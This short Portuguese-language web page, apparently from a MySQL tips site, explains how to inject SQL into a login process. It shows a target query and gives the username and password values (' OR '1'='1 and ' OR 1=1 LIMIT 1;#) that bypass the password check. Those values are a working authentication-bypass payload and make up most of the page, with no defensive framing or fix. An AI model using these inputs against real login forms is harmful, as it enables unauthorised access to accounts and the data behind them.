Mysql
 sql >> Base de Dados >  >> RDS >> Mysql

como injetar sql no processo de login


Começando com a consulta de meta:
SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Obtemos o nome de usuário é ' OR '1'='1 e a senha é ' OR 1=1 LIMIT 1;#